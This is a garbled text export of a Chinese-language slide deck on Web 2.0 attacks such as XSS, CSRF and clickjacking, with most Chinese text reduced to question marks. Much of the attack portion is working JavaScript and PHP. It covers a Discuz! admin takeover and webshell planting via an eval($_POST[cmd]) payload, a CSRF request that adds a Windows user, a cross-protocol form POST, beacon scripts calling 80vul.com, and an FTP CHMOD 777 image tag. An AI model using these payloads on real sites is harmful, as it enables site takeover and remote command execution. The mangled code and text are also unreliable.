WEB2.0??????


Slides: 46
Provided by: hei98

1
WEB2.0??????
  • 5up3rh3i_at_gmail.com

2
WEB1.0??????
  • ??web???????????cmdshell
  • iis60day.bin t www.microsoft.com p 80
  • ??web??????????webshell
  • ?????????web????????????sql???????
  • phpwind0day.php t www.phpwind.com p 80
  • ????
  • ???????,????????,?????????????,????????????,?
    ??????????????!

3
??WEB 2.0
  • Web2.0??????,?????????????,??????????????????
  • Web2.0???????????,??????????
  • AJAX???????web??2.0??,???????
  • web2.0?????????? ????wiki?sns?????
  • Web2.0???????web2.0????????!

4
WEB2.0??????
  • ?????
  • ???????XSS?CSRF?????????Clickjacking??
  • ?????????
  • ????????
  • ?????
  • ???????

5
?????
  • ?WEB1.0??,WEB2.0????????????
  • ??????,??????,??????????,????????????

6
???????--XSS
  • XSS?web1.0??,?web2.0?????
  • 1996????????????Jeremiah Grossman??
  • 1999?David Ross?Georgi Guninski??Script
    injection?
  • 2000?apache???????????Cross Site
    Scripting?
  • 2005?samy worm??,???XSS??web2.0??,xss??!!
  • 2007????XSS Attacks Book??XSS is the
    New Buffer Overflow, JavaScript Malware is the
    new shell code
  • XSS???
  • web1.0????alert()??cookiedocument.coo
    kie
  • web2.0??xss worm
  • ?????xss?????!???????90??!??????????bs????
    ?!
  • XSS / ????cookieworm
  • xss?????????javascript/html?,???javascri
    pt???????????!

7
???????--CSRF
  • CSRF---Cross Site Request Forgery
  • ???2000?,??2007/2008??
  • ???XSS???,???web2.0??? ?gmail?CSRF???
  • ?????????????????
  • ?http site
  • ???????????Bypass Preventing
    CSRF2008?
  • ??csrf???
  • CSRF worm ??2008.01?blog???????,2008.0
    9 80sec?? ??Hi Csrf????
  • ?????Inter-Protocol Communicationby
    Wade Alcorn 2006?,????????????????????????????webk
    it????http?irc???

8
    <script>
    // browser form POST aimed at a non-HTTP port (the inter-protocol communication demo cited on slide 7)
    gibson = document.createElement("form");
    gibson.setAttribute("name", "B");
    gibson.setAttribute("target", "A");
    gibson.setAttribute("method", "post");
    gibson.setAttribute("action", "http://127.0.0.1:6677");
    gibson.setAttribute("enctype", "multipart/form-data");
    crashoverride = document.createElement("textarea");
    crashoverride.setAttribute("name", "C");
    postdata = "USER A B C D \nNick xxxx\n";
    crashoverride.setAttribute("value", postdata);
    crashoverride.innerText = postdata;
    crashoverride.innerHTML = postdata;
    gibson.appendChild(crashoverride);
    document.body.appendChild(gibson);
    gibson.submit();
    </script>
9
???????--CSRF
  • ???????????????word winrar????

10
???????--???????
  • The Dangers of Third Party Content---by SanJose
    OWASP-WASCAppSec2007
  • 2009??????????Dz??(????????)
  • ??????????????????????????
  • web???????????,??bbs?????????
  • ?????????????,???????????js html??
  • ??JavaScript, HTML, Flash, CSS, etc.

11
???????--???????
  • ??????????????
  • ??????????
  • ??????????????????
  • ?????arp????(zxarps.exe )????????(SSClone)
  • ???????????????
  • ?,?????!
  • ?????????????
  • ???????????!

12
???????-- Clickjacking
  • Clickjacking--????
  • by Jeremiah Grossman and Robert Hansen in
    2008 ,????!
  • WEB 2.0??????????!
  • ????????,????http header??X-Frame-Options
  • ??????UI?? ?
  • Tapjacking ???? ?

13
?????????
  • ?????????,???????????
  • ???????????????????

14
????????
  • ??????????,??????????????????
  • ????????????!
  • ???????????????????
  • ????????????????

15
????????
  • ??????????????
  • ???????ID????cookie????
  • ?????????????
  • ??????,???????????????
  • ???????????
  • ?????????,????????????????????????????,??????
    ???????????
  • ?????? ?????,???????????????,???????????????????
    ????????????
  • ?????????????,???????????

16
????WEB2.0???????
  • Web2.0??xss????cookieworm
  • Web2.0??Mailxss?office???0day??
  • Web2.0??Xssshell?Beef?Anehta??
    xss???????
  • ?????????,??????

17
???????
  • ???????----??Dz??
  • ??????----??????????
  • ???web????????????
  • ??????????
  • ????????????

18
???????? Dz??
  • ???? Dz??
  • ??2009?1?8?????Discuz!?????????Hacked by
    ring04h, just for fun!????
  • ??????????????????,Discuz! ???????????????
  • ???????????????,???????????????????????http://customer.discuz.net ??javascript??
  • Discuz!_5.5.0_SC_GBK\upload\admin\global.func.php
    echo '<script language="JavaScript" src="http://customer.discuz.net/news.php?version='.rawurlencode(DISCUZ_VERSION).
         '&release='.rawurlencode(DISCUZ_RELEASE).'&php='.PHP_VERSION.'&mysql='.$dbversion.
         '&charset='.rawurlencode($charset).'&bbname='.rawurlencode($bbname).'&members='.$members.
         '&threads='.$threads.'&posts='.$posts.
         '&md5hash='.md5(preg_replace("/http:\/\/(.+?)\/.*/i", "\\1", $_SERVER['HTTP_REFERER']).
                         $_SERVER['HTTP_USER_AGENT'].DISCUZ_VERSION.DISCUZ_RELEASE.$bbname.$members.$threads.$posts).
         '"></script>';
  • ???????ring04h?????? http://customer.discuz.net ???????????js???!

19
  • ?????http://customer.discuz.net/news.php ????
    // ??FORMHASH
    xmlhttp.open("GET", siteurl + "admincp.php?action=home&sid=" + sid, false);
    xmlhttp.send(null);
    var datas = xmlhttp.responseText;
    var reg = /name="formhash" value="([\w\d]+)"/i;
    var arr = reg.exec(datas);
    var formhash = arr[1];
    // ??XMLHTTP POST?????
    xmlhttp.open("POST", siteurl + "admincp.php?action=settings&edit=yes", false);
    xmlhttp.setRequestHeader("Referer", siteurl);
    xmlhttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
    // form body as extracted from the slide (the percent signs of its URL-encoding were lost)
    xmlhttp.send(unescape("settingsnew5Bseohead5D3Cscript3Efunctioninit28297Bdocument.write2827Hackedbyring04h2Cjustforfun2127293B7Dwindow.onload3Dinit3B3C2Fscript3E0D0AsettingsubmitCCE1BDBBformhash" + formhash));
  • ????seo ?????html???,??js

21
  • ????????,?????????!!
  • ????????webshell???,????????????????,?
    // ??SODB-2008-10??webshell
    // http://www.80vul.com/dzvul/sodb/10/sodb-2008-10.txt
    xmlhttp.open("POST", siteurl + "admincp.php?action=runwizard&step=3", false);
    xmlhttp.setRequestHeader("Referer", siteurl);
    xmlhttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
    // form body as extracted from the slide (the percent signs of its URL-encoding were lost)
    xmlhttp.send(unescape("settingsnew5Bbbname5D3C3F_at_eval(_POSTcmd)3A3F3Esettingsnew5Bsitename5DComsenz Inc.settingsnew5Bsiteurl5Dhttp3A2F2Fwww.comsenz.com2Fstep2submitCFC2D2BBB2BDformhash" + formhash));
  • ???<?_at_eval(_POSTcmd)?>???forumdata/logs/runwizardlog.php???

22
  • ?????????

23
  • ???????????????,???????

24
  • ??discuz??????????????<script>?????js?,?????????????
  • ???????????<script>?????js?phpwind

25
??????
27
  • ??????
  • ???????????????img???steal.php???????????????,
    ????????,?????????????????
  • ????url
    http://ha.com/steal.php?data=%3Cscript%20src%3Dhttp%3A%2F%2Fwww%2E80vul%2Ecom%2Fsobb%2Falert%2Ephp%3E%3C%2Fscript%3E
    <script src=http://www.80vul.com/sobb/alert.php></script>

28
  • http://www.80vul.com/sobb/alert.php ???
    <?php
    $ip = getenv('REMOTE_ADDR');
    date_default_timezone_set('Asia/Chongqing');
    $date = date('Y-m-d H:i:s');
    $referer = getenv('HTTP_REFERER');
    $fp = fopen('LOGFILE', 'a');   // log file name lost in extraction; 'LOGFILE' is a placeholder
    fwrite($fp, "refer: $referer\r\ndate: $date\r\nip: $ip\r\ndata: \r\n----------\r\n\r\n");
    fclose($fp);
    ?>
  • ????????,
  • ?????????
  • ?ip?referer??url?

29
???web????????????
  • ?????2008????,???????..

30
  • Phpspy??csrf???,???????????phpspy???????????????
    (angel)????????
  • ??angel??phpspy2008???,??????????????,????????
    <script>
    // URL as extracted from the slide (query-string separators were lost)
    var url = 'http//localhost/phpspy/2008.php?actionshellexecfuncsystemcommandnet user heige heige /addecho fuck >c:\\heige.txt';
    getURL(url);
    function getURL(s) {
      var image = new Image();
      image.style.width = 0;
      image.style.height = 0;
      image.src = s;
    }
    </script>
  • ??????angel??????????url
  • ????????ie???????cookie??????!????????????!

31
  • ???????
  • ADz?????

32
  • ?????????webshell forumdata/logs/runwizardlog.php ??????,??web????apache?,??????????.
    xmlhttp.open("POST", siteurl + "forumdata/logs/runwizardlog.php", false);
    xmlhttp.setRequestHeader("Referer", siteurl);
    xmlhttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
    // ?????net user 80vul 80vul /add ???hack?????ftp tftp??echo iget.vbs?????????????
    // request body is truncated on the original slide
    xmlhttp.send("cmd6E6574207573657

33
  • B????????????

34
  • C??????????????ftp????????,????????????????????
  • Sun Solaris 10 ftpd?????????????????,?????ftp//??
    ??????????????
    <img src="ftp://.....////SITE%20CHMOD%20777%20FILENAME">

35
  • ????HackGame No.1

36
??????????
  • ?????????5??80vul???SOBB??,?????????,???????????
    ,??????????????????xss???
  • ???????????????????????????
  • ??????

37
????????????
  • 80vul????,??????????
  • ?????????????

    Content-Type: text/html
    Server: Microsoft-IIS/7.0
    X-Powered-By: PHP/5.2.12, <img src=http://80vul.com/anti/img.php onload=s=document.createElement("script");s.src="http://www.80vul.com/anti/anti.php";document.body.appendChild(s)>
    Date: Sun, 28 Nov 2010 11:21:26 GMT
    Content-Length: 5993
38
????????????
39
    <img src=http://80vul.com/anti/img.php onload=s=document.createElement("script");s.src="http://www.80vul.com/anti/anti.php";document.body.appendChild(s)>
  • ?<img>????img.php?,?onload????javascript??anti.php
  • ?????????img.php?anti.php????????,?????????????
    ???????

42
??????
  • ???????????,SDL??????
  • ????????????,???????,????????????????????!

43
??????
  • ???????????????????web?????
  • 1.??????????
  • 2.????????,????????
  • 3.?????????????,?????????????????????http
  • ????????????????????,???????js?????????????,???php
    wind?????js????,??????
  • ???????????

44
  • ???????,????!
  • ??????!

45
  • ????!!
  • ?????? ?